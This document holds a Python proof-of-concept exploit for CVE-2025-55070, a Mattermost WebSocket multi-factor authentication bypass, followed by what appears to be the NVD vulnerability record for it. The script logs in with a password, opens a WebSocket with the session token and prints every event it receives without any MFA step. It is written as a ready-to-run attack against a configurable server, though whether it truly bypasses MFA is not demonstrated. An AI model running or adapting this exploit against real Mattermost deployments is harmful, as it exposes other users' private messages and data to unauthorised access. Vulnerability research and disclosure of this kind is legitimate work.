CVE-2025-55070

# CVE-2025-55070 PoC - Mattermost WebSocket MFA Bypass # This PoC demonstrates connecting to Mattermost WebSocket without MFA verification import websocket import json import requests # Configuration MATTERMOST_URL = "https://mattermost.example.com" USERNAME = "[email protected]" PASSWORD = "password123" def get_auth_token(): """Login and get authentication token""" session = requests.Session() login_data = { "login_id": USERNAME, "password": PASSWORD } resp = session.post(f"{MATTERMOST_URL}/api/v4/users/login", json=login_data) if resp.status_code == 200: return resp.headers.get("Token"), session return None, None def connect_websocket_without_mfa(token): """Connect to WebSocket without MFA verification""" ws_url = MATTERMOST_URL.replace("https", "wss") + "/api/v4/websocket" ws = websocket.create_connection( ws_url, header={ "Authorization": f"Bearer {token}", "Origin": MATTERMOST_URL } ) # Send WebSocket authentication message auth_msg = json.dumps({ "seq": 1, "action": "authentication_challenge", "data": { "token": token } }) ws.send(auth_msg) print("[*] WebSocket connection established (MFA not enforced)") print("[*] Listening for sensitive events...") # Listen for events while True: try: result = ws.recv() event = json.loads(result) print(f"[EVENT] {json.dumps(event, indent=2)}") except: break # Main execution token, session = get_auth_token() if token: connect_websocket_without_mfa(token)

{"cve": {"id": "CVE-2025-55070", "sourceIdentifier": "[email protected]", "published": "2025-11-14T08:15:45.500", "lastModified": "2025-11-17T17:51:05.737", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mattermost versions <11 fail to enforce multi-factor authentication on WebSocket connections which allows unauthenticated users to access sensitive information via WebSocket events"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionEndExcluding": "11.0.0", "matchCriteriaId": "0E0A9668-C657-425B-BD7E-D1A0CC5648A8"}]}]}], "references": [{"url": "https://mattermost.com/security-updates", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}